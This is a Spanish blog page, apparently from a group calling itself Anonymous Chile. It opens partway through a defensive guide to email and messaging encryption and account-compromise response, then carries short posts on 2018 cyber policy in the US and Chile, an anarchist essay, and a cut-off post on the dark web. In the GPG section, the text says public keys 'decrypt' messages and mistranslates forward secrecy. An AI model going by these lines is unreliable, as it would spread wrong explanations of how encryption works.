Estés o no usando una conexión HTTPS, es fácil saberlo cuando te conectas a tu correo electrónico a través de correo web, pero el TLS también es importante cuando te conectas con un cliente de correo electrónico. Si quieres saber cómo mide tu actual proveedor de servicios de correo electrónico este tipo de cifrado o quieres revisar en un proveedor diferente, STARTTLS Everywhere muestra lo que hacen los diferentes proveedores.

Recuerda que, aunque TLS y HTTPS son útiles, no impiden que tu proveedor de servicios de correo electrónico, o cualquier otro servicio de comunicación que uses, vea el contenido de tus comunicaciones. Necesitarás otro tipo de cifrado para asegurarte de que solamente el destinatario elegido pueda ver tu mensaje.

Cifrado de extremo a extremo

Cuando un mensaje está cifrado en todo su traslado desde el dispositivo del remitente al dispositivo del destinatario, se llama de extremo a extremo o cifrado E2E. Es el cifrado que debes buscar cuando quieras que el contenido de tus comunicaciones quede tan en privado como sea posible.

El cifrado E2E que se usa más comúnmente para correo electrónico se llama GPG (o a veces PGP). GPG usa dos ‘llaves’ para cifrar mensajes. Tú guardas en secreto tu ‘llave privada’, y se usa para descifrar mensajes. Tu ‘llave pública’ se comparte con otros como una forma de dirección que se puede usar para descifrar mensajes para ti. Cuando envías un mensaje con GPG, necesitas la ‘llave pública’ del destinatario, y esto garantiza que solamente esa persona puede leer el mensaje que envías. GPG descifrará el contenido de tu comunicación (como el cuerpo de un correo electrónico) pero no los metadatos (para, de, asunto y fecha de envío).

S/MIME es otra opción para cifrar correo electrónico, pero es menos segura y más centralizada. No se recomienda S/MIME como una alternativa a GPG.

Algunas formas de cifrado también pueden ayudarte a saber exactamente con quién te comunicas. El proceso o mecanismo para revisar con quién estás hablando se llama frecuentemente «verificación». También se llama verificación a la revisión de un archivo para ver si ha sido alterado. Algunas herramientas protegerán el contenido de lo que envías y te protegerán de alguien que envíe un mensaje o un archivo, pero que haga que parezca que lo envía otra persona y no tú o agregará mensajes o partes de mensajes a una conversación. Esto puede ser poco importante para ti, pero suele ser una buena idea entender qué funciones te brindan los diferentes canales. Entender tus herramientas de comunicaciones te ayudará a usarlas de manera más efectiva y a tomar decisiones más apropiadas a tus necesidades. GPG y Signal, además de muchas otras opciones de comunicaciones cifradas, te permiten verificar al remitente de los mensajes. La verificación también te protege contra algunos ataques de phishing, hijacking y spoofing.

Es importante conservar registros de algunas comunicaciones y registros, pero la mayoría de nuestras comunicaciones no necesitan guardarse indefinidamente. Las plataformas de mensajería, como Signal y Wire, permiten a los usuarios configurar temporizadores de mensajes que desaparecen. Esto no impide que la persona que recibe un mensaje tome y guarde una captura de pantalla del mensaje. Los mensajes que desaparecen son una manera fácil de generar una limpieza automática para ti y el destinatario. Puede ser una buena manera de limitar qué información puede quedar expuesta en caso que el teléfono inteligente o computadora queden comprometidos física o digitalmente, o si roban o se pierde una computadora o un teléfono inteligente.

Cuando recibes correo electrónico cifrado con GPG se usa una llave privada y una contraseña para leer cualquier correo electrónico cifrado a esa llave. Con Signal y otros servicios de mensajería cifrados, hay una rotación de llaves, que a veces se llama «Reenvío de Reserva» o «Reenvío de Reserva Perfecto». Este método no es perfecto, pero tiene beneficios. Esto significa que poder descifrar un mensaje no significa poder descifrar todos los mensajes. Esto puede ser bueno para la seguridad de tus comunicaciones, pero significa que puedes perder la conveniencia de tener un archivo de todos los mensajes. Combinar esto con mensajes que desaparecen puede limitar mucho la cantidad de comunicaciones que puede quedar expuesta en un momento dado.

Crear un buen ambiente para tus conversaciones

Gran parte de los puntos tratados tratan sobre lo que puede ocurrir mientras tus comunicaciones se trasladan entre tú y el destinatario. Mantener tu correo electrónico seguro empieza con no permitir el ingreso de otras personas a tu correo electrónico. Puedes leer más sobre contraseñas fuertes y autenticación de dos factores (2FA), que es como una segunda contraseña que cambia constantemente en la guía de cómo Crear y mantener contraseñas fuertes.

Con un cliente de correo electrónico (como Thunderbird) o aplicaciones en tu teléfono inteligente, a menudo hay una copia de tus comunicaciones guardada localmente. Esto significa que también es importante aprender cómo Proteger tu dispositivo de software malicioso y ataques de phishing. Con todas tus cuentas, y hasta conversaciones telefónicas, debes ser consciente de la posibilidad de ataques de phishing. El phishing es cuando alguien trata de obtener información tuya, como contraseñas e información financiera, con engaños. Es muy efectivo para lograr acceso a una cuenta, y luego usar esa cuenta para engañar a personas que se han comunicado con la cuenta cuando la controlaba el verdadero propietario.

Un buen ambiente para proteger tus conversaciones va más allá de tus opciones. La comunicación es una actividad inherentemente social. Esto significa que es importante asegurarse de que las personas con quienes te comunicas también tomen medidas para proteger la comunicación entre ustedes. La tecnología no puede evitar que las personas se comporten mal, o hagan mal uso de la información que compartiste. Recuerda que el cifrado puede proteger tus datos de personas con las que no tuviste intención de compartir tus datos, no te ayudará con las personas con las que tratas de comunicarte. Puedes limitar parte de ese riesgo si tienes cuidado sobre quién tiene acceso a qué información.

Después de todo, una vez tomadas las precauciones, sigue siendo importante que tengas cuidado con lo que escribes en mensajes y que tengas en cuenta qué ocurriría si caen en manos equivocadas, pues los errores y los accidentes ocurren. Una manera de aumentar la seguridad del intercambio de información es elaborar un sistema de códigos para intercambio de información delicadas, para no tener que usar los nombres verdaderos de las personas, direcciones verdaderas de los lugares, etc.

Diferentes herramientas son mejores para algunos tipos de comunicación

Hay veces en que la manera más fácil de comunicarse es una conversación, en persona o a distancia, como con una llamada o videollamada. Otras veces, un mensaje corto o un documento más largo es una mejor opción. Imágenes, video y grabaciones de sonido también tienen ventajas específicas. Si envías mensajes o cualquier otro archivo, recuerda que incluyen metadatos, o información como fecha, lugar y dispositivo. Asegúrate de no tener problemas para comunicar esa información también. Algunas plataformas y servicios eliminan algunos metadatos de imagen y archivos, pero otros no.

Busca herramientas de comunicaciones seguras que incluyan los métodos que usas generalmente o haz un plan específico para cambiar cómo sueles comunicarte. Aunque recomendamos GPG, Signal y Riseup, tal vez necesites opciones diferentes. Otras opciones a tener en cuenta pueden incluir: Wire y WhatsApp para mensajería y llamadas; Briar, XMPP con OTR y Ricochet para mensajería; meet.jit.si u otro ejemplo de reuniones para llamadas de video y voz de varios participantes (a veces el cifrado no es E2E, pero no registran ni supervisan tus conversaciones como Skype); Tutanota y ProtonMail para correo electrónico cifrado; o Crabgrass, Mastodon y Matrix para medios sociales y grupos de discusión u opciones de chat para grupos.

Aunque creas haber encontrado las opciones perfectas, debes evaluar otras opciones. Es una buena idea tener un método de comunicación de respaldo en caso que tu método principal deje de funcionar brevemente. Sin un método de comunicación secundario, tal vez te quedes fuera en un momento crítico y no puedas comunicarte de manera segura, o debas elegir una herramienta que no conoces.

Tener un plan de comunicación

Cada método de comunicación tiene sus pros y sus contras, pero saber qué limitaciones existen puede ayudarte a planificar. Es recomendable tener un plan específico acerca de cómo te vas a comunicar y qué hacer si algo no funciona o sale mal. Esto puede incluir tener una dirección de correo electrónico de respaldo, compartir números de teléfono o tener listas de contactos de emergencia, u opciones más formales como incluir tus comunicaciones en tu política de seguridad y almacenamiento de datos o política de retención de documentos.

Tener un plan preparado y ensayado puede ayudar a cuidar a tu comunidad y a ti, en momentos de tensión o crisis. Es mucho más fácil y rápido preparar un plan por anticipado que averiguar las mejores opciones en el momento.

Consejos para responder a sospechas de ataques y vigilancia de correo electrónico

Si sospechas de ataques a tu cuenta de correo electrónico, de mensajería, dispositivos electrónicos o que están en peligro, puedes tomar medidas para reducir el daño. Aunque es difícil estar seguros, hay algunas pistas:

  • Notas cambios en el contenido o configuraciones de tu cuenta de correo electrónico que no hiciste.
  • Los contactos de tu correo electrónico te notifican que han recibido un correo electrónico que no enviaste (aunque también es posible que alguien «imite» tu correo electrónico y haga que parezca que un mensaje salió de tu cuenta cuando no fue así).
  • No puedes iniciar sesión en tu cuenta de correo electrónico, pese a estar seguro de que tu contraseña y configuraciones son correctas.
  • No recibes algunos mensajes de correo electrónico con frecuencia de colegas que insisten en haberlos enviado.
  • Información privada enviada o recibida por correo electrónico es de conocimiento de un tercero, aunque ni tú ni la persona a quien se lo enviaste la compartió con nadie.
  • Recibes avisos de cambio de contraseña cuando no has cambiado la contraseña.
  • Perdiste tu teléfono móvil o alguien en quien no confías se lo llevó y estaba con tus cuentas abiertas.
  • Si en el registro de actividad de tu cuenta (si tu proveedor de correo electrónico cuenta con ese registro) notas que accedieron a tu cuenta en un momento que no recuerdas o de un lugar (o dirección IP) a donde no has ido.

En cualquiera de estas situaciones, tal vez debas:

  • Dejar de usar esta cuenta para intercambio de información delicada, al menos hasta que entiendas mejor la situación.
  • Cambiar tu contraseña inmediatamente. Revisa nuestra guía Saber cómo crear y mantener contraseñas seguras. Cambia la contraseña de todas las otras cuentas con la misma contraseña o parecida, pues también pueden estar comprometidas. Usa contraseñas diferentes y fuertes para cada cuenta. Usar un administrador de contraseñas, como KeePassX or KeePassXC, te lo facilita. Cambia las respuestas de tus preguntas de seguridad (si las usas) para todas tus cuentas, para que sea imposible adivinarlas, o que nadie encuentre la respuesta investigándote un poco.
  • Revisa las configuraciones de seguridad para ver si puedes cerrar todas las sesiones, es decir, que deberás iniciar sesión de nuevo en cualquier dispositivo en el que quieras acceder a la cuenta.
  • Habilita la autenticación de dos factores (2FA), si tu proveedor de correo electrónico lo permite, como una manera de evitar que cualquier persona que haya obtenido tu contraseña acceda a tu cuenta. Echa un vistazo al sitio web Two Factor Auth para ver si tu proveedor ofrece esta función. Al registrarte en 2FA, te pedirá que presentes un código de un solo uso además de tu nombre de usuario y contraseña. Por lo general, te envían este código (suele ser a través de mensaje de texto SMS) o se genera con una aplicación diferente en un dispositivo móvil o computadora. Usar una aplicación con la autenticación de dos factores es considerablemente más seguro. No podrás acceder a tu cuenta sin esa autenticación, ni tampoco podrá acceder otra persona. Google, Facebook y Twitter ofrecen guías útiles sobre cómo habilitar la autenticación de dos factores para sus respectivos servicios.
  • Si no puedes iniciar sesión en tu cuenta para cambiar las contraseñas, puedes contactar al proveedor de correo electrónico para recuperar tu cuenta. Algunos proveedores de correo electrónico tienen habilitados procedimientos especiales para ayudar a los usuarios en esa situación, pero no es así con todos.
  • Reduce la pérdida de información y el impacto en tu comunidad. Es importante hacer un plan de respuesta. Que sepas qué información delicada tenías en tu cuenta y determinar las personas con quienes intercambias información a través de esa cuenta, que decidas a quién debes alertar y qué otras cuentas deberás volver a visitar o cerrar. Evalúa revisar las configuraciones de tu cuenta para ver los posibles cambios que se hayan hecho. Revisa la opción de firma de cuentas para buscar enlaces y software malicioso, opciones de reenvío que te permitirán copiar correos electrónicos que recibes a una tercera cuenta, mensaje de vacaciones, nombres mostrado, etc. También deberás revisar otras cuentas, como servicios de mensajería y medios sociales que estén conectados o vinculados a esa cuenta.
  • Investiga cómo quedó expuesta tu cuenta. ¿Fue por tener una contraseña débil o por infección de software malicioso? Cuanto más sepas de las circunstancias que llevaron a ponerla en riesgo, estarás en mejor posición de responder, proteger tus contactos y evitar que te ataquen de la misma manera en el futuro.
  • Revisa la seguridad de todos tus dispositivos que acceden a correos electrónicos desde esta cuenta, y los dispositivos en los que guardaste la contraseña de esta cuenta de correo electrónico. Busca guías y manuales sobre cómo proteger tu computadora de software malicioso y ataques, cómo proteger tu información de amenazas físicas y cómo usar teléfonos inteligentes de manera tan segura como sea posible. Si no estás seguro de poder limpiar tu dispositivo, evalúa reinstalar todo el software, incluido el sistema operativo, de una fuente limpia. Después de haber hecho estas mejoras a la seguridad de tus dispositivos, cambia las contraseñas de tu cuenta por otra más fuerte.
  • Evalúa usar otra cuenta más segura, es decir, una que te notifique e impida acceso de lugares o dispositivos no habituales. Evalúa usar cuentas que estén alojadas fuera de tu país. Evalúa usar cifrado de correo electrónico – lee las guías para Thunderbird, Enigmail y GPG para Windows, GNU/Linux y Mac.
  • Evalúa cambiar a una aplicación de mensajería cifrada con mensajes que desaparecen, como Signal, para que haya un intervalo menor en el que se puede acceder al mensaje si el dispositivo se pierde o lo roban y no puedes borrarlo de manera remota.
  • Evalúa pedir ayuda de un experto. Puede haber tecnólogos o investigadores de seguridad en tu comunidad o red extendida que podrían ayudarte. Access Now tiene una línea de ayuda que brinda asistencia técnica y recomendaciones a grupos de la sociedad civil y activistas, organizaciones de medios, periodistas y blogueros, y defensores de derechos humanos.
  • Recuerda, la seguridad del correo electrónico no es solamente tener defensas técnicas fuertes. Se trata de prestar atención a cómo se comunican tú y tus contactos de correo electrónico, y de estar atento a tus hábitos de seguridad no técnicos.

Lectura adicional

  • Para saber más sobre falsificar una identidad de correo electrónico, consulta la sección 2.5 Engaño del libro Seguridad digital y privacidad para defensores de derechos humanos.
  • La guía de privacidad de Gmail, que debes aceptar cuando creas una cuenta de Gmail explica que «Google conserva y procesa tu cuenta de Gmail y sus contenidos para ofrecerte el servicio de Gmail y mejorar nuestros servicios». En realidad, todos los proveedores de correo electrónico examinan tus mensajes hasta cierto punto, para que puedan ofrecer servicios antispam y otras funciones. Sin embargo, Gmail va un poco más allá para brindar ‘publicidad dirigida’ según el contenido de tu correo electrónico.
  • Una serie de entrevistas en 2008 abordó las políticas de privacidad y cifrado de varios importantes servicios de mensajería instantánea.
  • Si te interesa la interferencia de comunicaciones de radio (como redes telefónicas y puntos de acceso inalámbrico), mira qué es posible con Wireshark, un analizador de paquetes de código libre.
  • Access Now tiene una línea de ayuda que es un recurso sin costo para la sociedad civil en todo el mundo, y ofrece asistencia técnica directa en tiempo real y asesoría a grupos de la sociedad civil y activistas, organizaciones de medios, periodistas y blogueros, y defensores de derechos humanos.
  • Protege tus comunicaciones mediante la aplicación de mensajería segura «Wire» con uso compartido de archivos, llamadas de voz, videoconferencias, destrucción inmediata o «temporizada» de los datos y mensajes, todo con cifrado E2E y bajo servidores de código libre (licencia AGPLv3). Acceso disponible para todos los sistemas desde vía web hasta escritorio.
  • Mensajería segura con Matrix: Protocolo de comunicaciones cifradas de código libre, descentralizado y federado, con una gran cantidad de clientes, múltiples nodos donde registrarse y con sistema de videoconferencias especializado. Acceso disponible para todos los sistemas desde vía web hasta escritorio.
  • Jami (anteriormente GNU Ring y SFLphone) es un softphone de código libre, seguro, distribuido, adaptable, potente, gratuito, sin publicidad y compatible con SIP y mensajería cifrada basada en SIP para GNU/Linux, Microsoft Windows, OS X, iOS y Android. Desarrollado y mantenido por la empresa canadiense Savoir-faire Linux, y con la ayuda de una comunidad global de usuarios y colaboradores, Jami se posiciona como un potencial sustituto gratuito de Skype.
  • Comunicaciones descentralizadas mediante F2F con Ricochet: Software de mensajería instantánea, cifrada de extremo a extremo y con autodestrucción inmediata de los datos almacenados localmente, cuyo objetivo principal es crear una plataforma de comunicaciones anónimas y libre de metadatos.
  • Comunícate de manera segura cifrada de extremo a extremo mediante F2F (P2P Anónimo) con Retroshare, un cliente de mensajería instantánea que soporta correo electrónico, compartición de archivos, foros, blogs, llamadas y vídeoconferencia.
  • Comunicaciones seguras y distribuidas mediante F2F con TOX, el cual implementa videoconferencias, transferencia de archivos y mensajería instantánea cifrada de extremo a extremo dentro de un conjunto de clientes para cada sistema, plataforma y entorno muy intuitivos y fáciles de usar.
  • Jabber/XMPP con OMEMO: XMPP (Extensible Messaging and Presence Protocol), anteriormente llamado Jabber, es un protocolo abierto y extensible de comunicación instantánea distribuida y federada basado en XML. OMEMO es un algoritmo de cifrado E2E y autentificación de identidades en XMPP. Para mayor seguridad, se recomienda conectarse desde máquinas virtuales mediante la red obscura.
  • Comuníquese de manera segura con el cliente multiplataforma de VoIP y mensajería instantánea, Jitsi, incorporando cifrado mediante los protocolos SRTP, ZRTP y OTR en las conversaciones privadas. ADVERTENCIA: Luego de la última y actual versión de OTR, 4.1.1 publicada el 9 de marzo del año 2016, se han encontrado serias vulnerabilidades que podrían comprometer potencialmente la confidencialidad de las comunicaciones. Su uso está desaconsejado hasta la siguiente actualización en espera de que solucionen dichas falencias; mientras de momento se recomienda utilizar OMEMO en su remplazo. Más información en: https://bugs.otr.im/ y https://otr.cypherpunks.ca/software.php.
  • Tutanota es un servicio de correo electrónico seguro de código libre (GNU GPLv3) gratuito. Tutanota ofrece cifrado de extremo a extremo, además también cifra por defecto todos los correos electrónicos y contactos. Junto a ello, utiliza un método híbrido estandarizado que consiste en un algoritmo simétrico y asimétrico AES con una longitud de 128 bits y RSA con 2048 bits. A los destinatarios externos que no utilizan Tutanota, se les envía una notificación con un enlace a una cuenta temporal de Tutanota. Después de introducir una contraseña previamente intercambiada, el destinatario puede leer el mensaje y contestar mediante un mensaje cifrado de principio a fin.
  • Autistici/Inventati es una plataforma de comunicaciones seguras, mantenida por una comunidad de criptoanarquistas italianos desde hace más de 10 años, que incorpora correo electrónico, mensajería instantánea, servicios de anonimato y alojamiento web. Para más información, favor de leer en Manifesto o dirigirse a Services para conocer lo que ofrece a disposición de sus usuarios.
  • Disroot es una plataforma abierta, libre y transparente, radicada en Amsterdam y basada en los principios de libertad, privacidad, federación y descentralización, que ofrece servicios de correo electrónico cifrado, busqueda web, interacción mediante foros, almacenamiento de datos seguro mediante Nextcloud, redes sociales libres, federadas y distribuidas, publicación y edición de documentos colaborativa y mensajería instantánea.
  • Protonmail es un servicio de correo seguro libre y abierto con cifrado E2E radicado en Suiza que es mundialmente reconocido por brindar unos niveles de privacidad avanzados como un intento de proteger a sus usuarios del espionaje y vigilancia global indiscriminados contra la población inocente.
  • Mailfence es un servicio de correo electrónico libre, abierto y seguro que incorpora multiples funcionalidades dentro de su plataforma y está basado en el estándar OpenPGP, que ofrece cifrado de extremo a extremo y firma digital.
24 comentarios

Nueva política de Donald Trump iniciará ciberataques contra objetivos extranjeros

Publicada el 13/10/2018 - 19/10/2018 por Anonymous Chile

“Vamos a hacer muchas cosas ofensivamente y creo que nuestros adversarios deben saberlo”, dijo el consejero de seguridad nacional, John Bolton.

Los ataques informáticos están a la orden de día. No obstante, hace algunas horas la Casa Blanca anunció que Trump firmó un documento que permite ciberataques ofensivos contra objetivos extranjeros. Es el primer documento de estrategia nacional «completamente articulado» en 15 años.

En el prólogo de Cyberpunks «La libertad y el futuro de internet», Enrique Dans esboza de forma precisa lo que hace bastantes años sucede en la red: “El ciberespacio, en todos los sentidos, se ha militarizado. El equivalente de lo que está ocurriendo en la red situado en la calle, fuera de la red, sería directamente la ley marcial. La red y el libre intercambio de información podrían estar posibilitando un período histórico que supusiese el mayor y más vibrante progreso a todos los niveles, pero están en su lugar alumbrando la época más oscura, autocrática y totalitaria que el ser humano ha vivido jamás”.

Por eso la decisión de Trump es en cierto modo predecible. El documento denominado “Estrategia Nacional Cibernética” fue anunciado en un tono intimidante por el mismo consejero de seguridad nacional, John Bolton. En una rueda de prensa dijo a periodistas lo siguiente:

Vamos a hacer muchas cosas ofensivamente y creo que nuestros adversarios deben saberlo (…) Identificaremos, contrarrestaremos y disuadiremos el comportamiento en el ciberespacio que es desestabilizador y contrario a los intereses nacionales (…) América inventó Internet. Ha traído prosperidad y productividad a las vidas estadounidenses y a las de todo el mundo. En el futuro debemos hacer más para garantizar que sea seguro y siga siendo un motor del crecimiento estadounidense.

Las tecnologías de vigilancia y ofensiva a civiles quedan con una linea delgada y difusa en todo esto (EE.UU. nunca ha tenido buena fama en el tema). Los periodistas presentes, según Washingtonexaminer preguntaron por esto y la respuesta, no escatimó:

Depende de si son hostiles actuando contra nosotros, básicamente (…) Las personas que deben preocuparse por esto son las que se han tomado o se están preparando para tomar acciones hostiles en el ciberespacio contra nosotros, ya sean estados extranjeros, organizaciones terroristas, organizaciones delictivas o lo que sea.

Bolton no citó amenazas específicas más allá de los conocidos WannaCry y NotPetya, junto a un ciberataque que contra la adminsitración de Atlanta.

85 comentarios

En contra del Organizacionalismo: Anarquismo como teoría y crítica de la organización

Publicada el 13/10/2018 por Anonymous Chile

Uno de los clichés más molestos que aparecen con mayor frecuencia en la retórica de las políticas de izquierda se relaciona con el imperativo incuestionable de una forma no específica, genérica de “organización”. Aunque puedan existir otros aspectos que definan la izquierda, de manera consistente siempre han llamado a la creación y desarrollo de organizaciones formales que supuestamente deben representar y dirigir las masas o la clase trabajadora (o en estos días el apropiado grupo de identidad o “minoría”). Por supuesto, cuando la gente de izquierda deja el reino de la retórica y entra en el reino de la práctica, se vuelve muy evidente de por qué los detalles de la organización generalmente no son especificados. Es fácil decir que gente no-organizada o gente desorganizada probablemente no tendrá mucho éxito persiguiendo grandes y complejos proyectos, pero cuando la forma de organización propuesta propugna llamados por un estructura de “correa de transmisión” con una división explícita entre líderes y liderados, junto con darle disposiciones a los líderes para disciplinar miembros, mientras se les protege de la responsabilidad de los que están siendo dirigidos, más de algunos se darán cuenta de este juego del engaño y lo rechazarán. Incluso la adición de un poco d democracia en estos días no es suficiente para disfrazar el hedor de la política de poder.

Nada de esto sorprende a la mayoría de los anarquistas, ya que las corrientes principales de la izquierda han sido explícitamente jerarquizadas, autoritarias y estatistas desde el comienzo de la época de los Jacobinos y la revolución francesa. Sin embargo, incluso los anarquistas —o al menos aquellos anarquistas más cercanos a la izquierda— no han sido inmunes al fetichismo organizacional. Desde una preocupación genuina para ayudar a crear las condiciones por aquellos que carecen a que tomen de vuelta su mundo, la imperativa organizacional de izquierda es muchas veces confundida con una estrategia saludable, lo cual ha sido desafortunadamente desacreditado y socavado por aquellos poco éticos, sedientos de poder, autoritarios de izquierda.

Es cierto que la desilusión creciente y generalizada con la organización formal entre genuinos radicales es muchas veces el resultado de 200 años de una práctica izquierdista contra-productiva. Pero la organización de izquierda no es solo una buena estrategia corrompida por un mal personal. La misma estrategia de construcción de organizaciones con una teoría y valores más radicales continuarán produciendo el mismo tipo de prácticas auto-destructivas precisamente porque los problemas subyacentes son estructurales y no accidentales. El culto a la organización —en el cual la construcción y ampliación de organizaciones político-económicas masivas y formales toman prioridad sobre cualquier llamamiento a la generalización de la auto-organización anarquista— directamente contradice los principios y metas anarquistas. El Organizacionalismo [1]promueve y produce prácticas autoritarias, jerarquizas y alienadas porque se basan en la idea de que las personas deberían ser organizadas por militantes políticamente conscientes, en vez de basarse en la idea anarquista de que las personas deben auto-organizarse por su propia liberación.

Históricamente, la idea anarquista, la teoría anarquista y el movimiento anarquista internacional se originaron como respuesta crítica a los problemas surgidos de la organización radical. Aun así, hoy en día, muchos anarquistas de izquierda toman el trabajo de rehabilitar una retórica y práctica organizacional problemática, basándose solo en críticas superficiales en contra de la izquierda explícitamente autoritaria y estatista buscan prevenir —al menos, eso esperan— que sus proyectos repliquen la duplicidad de muchos de los desastres de la izquierda que manchan la historia revolucionaria.

Todos los anarquistas se diferencian de la izquierda política en un punto central: los anarquistas proponen auto-actividad, auto-dirección y auto-organización tanto individual como comunal [2]como el único método posible para tomar control de nuestras vidas. La izquierda política, por el contrario, proponen la organización de la gente como objetos, con tal de ganar poder político necesario para realizar cambios a las condiciones sociales institucionalizadas. Los más radicales de la izquierda añadirán que este cambio en las condiciones institucionales puede ayudar a traer la posibilidad de que las masas eventualmente desarrollaran una suficiente conciencia de sí mismos como para gobernarse a ellos mismos. Pero esto es, por supuesto, relegado a un futuro indefinido.

Dada la desintegración en marcha de la izquierda internacional, se ha vuelto más importante para los anarquistas redescubrir y reconsiderar las bases del movimiento anarquista en lo que respecta teoría y crítica anarquista de la organización. A medida que más izquierdistas y ex-izquierdistas entran en el medio anarquista, se vuelve de mucha importancia recordar que el anarquismo no es solo una forma de izquierdismo sin la meta explicita de tomar el control del poder del estado. Toda la cultura de representación, jerarquización, organización, disciplina heterónoma y culto a los liderazgos presentes en las políticas de izquierda es contraria a la cultura anarquista de la autonomía, la libre asociación, la auto-organización, la acción directa y la responsabilidad personal. Las prácticas de izquierda de crear organizaciones masivas y formales para lograr construir poder político involucra diferentes asunciones y metas distintas a que aquellas propuestas por la práctica anarquista de la actividad auto-dirigida.

Todas las variadas formas del anarquismo de izquierda involucran intentar converger aspectos del Organizacionalismo de izquierda con aspectos de la organización anarquista. Y todos estos intentos de convergencia requieren de algún grado de sacrificio de la teoría, practica y valores anarquista a cambio de un aumento anticipado en el atractivo ideológico o en el poder práctico. Pero los anarquistas siempre sacrificarán sus propios principios a grandes riesgos. Han existido poderosas convergencias entre la izquierda y el anarquismo que han permitido grande contribuciones prácticas hacia la revuelta, la insurrección y la revolución en un pasado: por ejemplo el apogeo del anarco-sindicalismo alrededor de los siglos 19 y 20. Pero esto siempre ha llegado al precio de diluir y confundir el lado anarquista de la convergencia, lo que finalmente los llevo a la derrota.

En orden de prevenir futuras derrotas, podemos conscientemente basar nuestra práctica en principios consistentes de auto-organización, siempre con los menos compromisos posibles, y con una clara mirada puesta en nuestras metas.

[1]También conocido como Proselitismo.

[2]Se refiere a que tanto el individuo debe planificar, organizar y llevar a cabo la actividad en sí por el mismo, y si requiere de ayuda, que esta sea una ayuda auto-organizada y no coercitiva, alienante o dirigida por otra persona o grupo social. En sentido comunal los individuos podrían coordinarse por un interés en común que beneficie directamente a cada uno de los participantes.

93 comentarios

Consulta Ejecutiva en Ciberseguridad Chile-EE.UU.

Publicada el 13/10/2018 - 19/10/2018 por Anonymous Chile

Representantes de alto nivel de Estados Unidos y Chile participaron en la Consulta Ejecutiva en Ciberseguridad, efectuada en Washington, D.C. los días 23 y 24 de agosto pasados, donde profundizaron la cooperación bilateral en temas informáticos, incluyendo las capacidades gubernamentales para abordar los desafíos emergentes y las amenazas que enfrentan en el ciberespacio.

Durante los dos días de reuniones, los funcionarios se enfocaron en materias claves sobre política informática y de internet, tales como el mejoramiento de la ciberseguridad, incluyendo la protección de la infraestructura crítica, el combate al cibercrimen, y el aumento de la ciberdefensa. También analizaron los eventos ocurridos recientemente en el ámbito de la seguridad informática internacional en el ciberespacio, y consideraron cómo mejorar de manera más efectiva su colaboración en la disuasión de las actividades informáticas maliciosas. Asimismo, en un diálogo con el sector privado enfatizaron los beneficios de contar con alianzas público y privadas en torno a las políticas informáticas.

A continuación, el comunicado conjunto emitido por los gobiernos de Estados Unidos y Chile tras la reunión:

Los gobiernos de Estados Unidos y Chile afirman su compromiso de ampliar y profundizar su cooperación bilateral para promover una internet global abierta, interoperable, confiable y segura que apoye la innovación, el crecimiento económico, y el desarrollo social.

Ambos países afirman su visión de que, tanto en el ciberespacio como en cualquier otro lugar, los estados tienen una responsabilidad especial de promover la seguridad y la estabilidad con otras naciones. Ambos gobiernos también afirman que las normas voluntarias, no vinculantes, de comportamiento del estado en el ciberespacio en tiempos de paz contribuyen a la estabilidad informática internacional.

Ambos países se comprometen a trabajar juntos en promover y desarrollar el creciente consenso internacional en el marco de un comportamiento responsable del estado en el ciberespacio, e impulsar esfuerzos en las Américas para construir alianzas confiables entre los países de ideas afines. Ambos países además afirman la importancia de la cooperación entre estados de ideas afines para disuadir las actividades informáticas maliciosas contrarias a dicho marco.

Estados Unidos y Chile se comprometen a continuar desarrollando una estrecha colaboración en torno a la ciberseguridad, la protección de la infraestructura crítica, de respuesta ante incidentes, la protección de datos, la provisión de tecnologías informáticas y de comunicación, la seguridad informática internacional, y la cooperación militar y entre instituciones de aplicación de la ley a través del establecimiento de canales sólidos para la comunicación abierta en torno a los asuntos informáticos de cuidado.

El señor Robert Strayer, subsecretario adjunto para Seguridad Informática y Comunicaciones Internacionales y Política de Información, del Departamento de Estado, encabezó a la delegación que integró a diversas agencias del gobierno de los Estados Unidos. La representación estadounidense estuvo integrada por funcionarios de alto nivel del Departamento de Estado, del Consejo de Seguridad Nacional, del Departamento de Seguridad Nacional, del Departamento de Justicia, del Departamento de Defensa, del Departamento del Tesoro, y del Departamento de Comercio.

El subsecretario de Defensa Cristián de la Maza encabezó a la delegación chilena, la cual también incluyó a funcionarios de la Secretaría General de la Presidencia, del Ministerio de Relaciones Exteriores, de la Fiscalía Nacional, de la Agencia Nacional de Inteligencia, y del Ministerio del Interior.

5 comentarios

Gobierno de Chile solicita aumentar seguridad para evitar futuros ciberataques

Publicada el 13/10/2018 - 19/10/2018 por Anonymous Chile

El presidente Sebastián Piñera a través de sus ministros pidió más rapidez en la toma de medidas concretas para combatir los delitos informáticos.

El presidente Sebastián Piñera está preocupado por la situación que afectó al Banco de Chile y el hackeo que oficialmente costó a la institución el robo de más de $10 millones de dólares.

El mandatario pidió a sus ministros estudiar modificaciones legales que permitan elevar los estándares de seguridad, tanto en el sector privado como público.

Esto llevó al ministro del Interior, Andrés Chadwick, a citar al comité interministerial “para efectos de garantizar y fortalecer la ciberseguridad, al igual que el ministro de Hacienda, con una reunión técnica con el ámbito financiero y creemos que es indispensable aumentar y hacer una coordinación eficaz para elevar las garantías de poder combatir e impedir ataques a través de hackers u otras formas” a la infraestructura pública y privada.

En esta misma línea, el senador Felipe Harboe, quien sostuvo una reunión con el titular del Interior, planteó la necesidad de concretar un equipo especializado que se haga cargo de los temas de ciberseguridad y cibercrimen, apuntando a la necesidad de que Chile cuente con una política pública permanente al respecto.

A juicio del legislador PPD, dado que la actual Ley de Delitos Informáticos data del año 1993, “se requiere actualizar normas, pero también procesos y fiscalizar que el sector privado esté haciendo las inversiones adecuadas», señaló.

“Es evidente que Chile está en riesgo de ser víctima de ataques de bandas de cibercrimen a nivel mundial. El país ha sido escogido como un objetivo, probablemente lo ocurrido con el Banco de Chile es el primero de los ataques, no hay que descartar que puedan existir otros, razón por la cual se requiere aumentar los estándares de seguridad de infraestructura crítica, tanto del mundo privado como del mundo público”, indicó el senador del PPD.

35 comentarios

Internet Obscura: concepto, características y niveles.

Publicada el 13/10/2018 - 19/10/2018 por Anonymous Chile

¿Qué es?

